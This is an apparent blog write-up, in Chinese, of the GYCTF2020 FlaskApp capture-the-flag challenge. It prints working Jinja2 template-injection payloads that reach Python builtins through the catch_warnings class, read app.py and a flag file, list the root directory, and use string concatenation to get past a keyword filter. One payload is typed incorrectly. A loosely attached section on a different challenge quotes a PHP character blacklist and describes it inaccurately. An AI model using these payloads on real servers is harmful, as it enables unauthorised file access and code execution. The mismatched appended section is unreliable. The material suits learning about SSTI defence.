[GYCTF2020]FlaskApp

31 篇文章 4 订阅
8 篇文章 0 订阅

[GYCTF2020]FlaskApp

1.前言

最近的比赛太多了,每个比赛里面的Web方向的题目都千奇百怪,最近的Web题目能够遇到一个之前了解过的漏洞是越来越难了。像我这种已经被边缘化的Web狗在这种大比赛面前已经没有生存的空间了。仍然是继续补习SSTI的一天,继续打靶场吧。

2.正文

首先拿到题目
请添加图片描述
这是一个用flask写的用来加解密base64的Web应用程序。我们来测试一下它的报错情况,因为对于python来讲base64的解密过程,如果用户所输入的字符的格式不是base64的话,程序就会报出一个异常错误。所以,我们在解密窗口随便输一串字符就可以了(不会有人随便输一串字符都是base64的吧doge)
请添加图片描述
我们看到了一个熟悉的函数render_template_string(),这说明这个网站存在着SSTI,我们尝试注入{{11}}
请添加图片描述
解密结果
请添加图片描述
可以看到是可以将用户的输入进行渲染的,我们完成了SSTI的测试。但是,事实上我们用{{22}}进行测试的时候,遇到了拦截,看来该程序存在着一个小的WAF。
请添加图片描述
请添加图片描述
后来,我确定了我之所以输入{{2
2}}被waf拦截是因为我这其中的星号,但是为了后续的注入过程,我们仍要将该网站的源文件读出来,来看看其中都过滤了什么?
先输入{{().__class__.__mro__}}尝试一下
请添加图片描述
我们要利用object对象进行测试同时也要找到含有内建函数__builtins__的类,再借用builtins中的open来读取源文件。

{% for c in [].__class__.__mro__[-1].__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read()}}{% endif %}{% endfor %}

请添加图片描述
我们从源码中读到了一些信息,其中就有waf的过滤信息。我们用字符串拼接的方式进行绕过。我们这一次构造列出根目录信息的payload

{% for c in ().__class__.__mro[-1]__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}

请添加图片描述
我们看到了一个this_is_the_flag.txt文件,通过小改一下第一次的payload,来构造这一次的文件读取payload。

{% for c in ().__class__.__mro__[-1].__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_f' + 'lag.txt','r').read()}}{% endif %}{% endfor %}

请添加图片描述

后记

这道题的预期解并不是这个样子的,这道题的预期解是通过flask的pin码来从debug界面获得一个可用的命令行。但是最近在学SSTI而且看到了网上很多大师傅的绕过姿势,就想着自己也用纯SSTI的方式来做这道题。

参考文章

### GYCTF2020 Blacklist 题目解析 #### Web 应用防火墙(WAF)分析 WAF配置显示,`calc.php`文件中的过滤机制非常严格。具体来说,该PHP脚本会检测并阻止任何包含特定字符的输入请求,这些被屏蔽的字符包括但不限于空格、制表符、回车符、换行符以及常见的SQL注入元字符如单引号(`'`)、双引号(`"`)[^1]。 ```php $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]', '$','\\','^']; foreach ($blacklist as $blackitem) { if (preg_match('/' . $blackitem . '/m', $str)) { die("what are you want to do?"); } } ``` 此段代码表明服务器端对于用户提交的数据进行了严格的预处理,旨在防止恶意攻击者利用特殊字符绕过安全防护措施执行非法操作。 #### SQL 注入尝试方法 尽管存在上述黑名单过滤策略,在实际渗透测试过程中仍然可以采用一些技巧来规避这种防御手段。例如,通过模糊测试(SQL Fuzzing),即向目标应用发送一系列构造好的查询字符串以观察其响应行为模式变化;这种方法有助于识别潜在的安全漏洞所在之处[^2]。 当遇到较为复杂的过滤条件时,则可能需要借助自动化工具编写自定义脚本来持续不断地试探不同类型的payload组合直至找到有效的突破点。 #### 绕过技术探讨 针对此类情况的一种常见解决方案是使用编码转换或者寻找替代表达方式实现相同功能而不触发报警机制。比如: - 利用手动URL编码或其他形式转义避开直接匹配; - 尝试替换某些敏感关键字为同义词或近似结构; - 构建多层嵌套逻辑混淆语法特征减少单一特征命中率。 最终目的是构建能够成功传递给后端解释器但仍保持原有意图的有效载荷(Payload)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值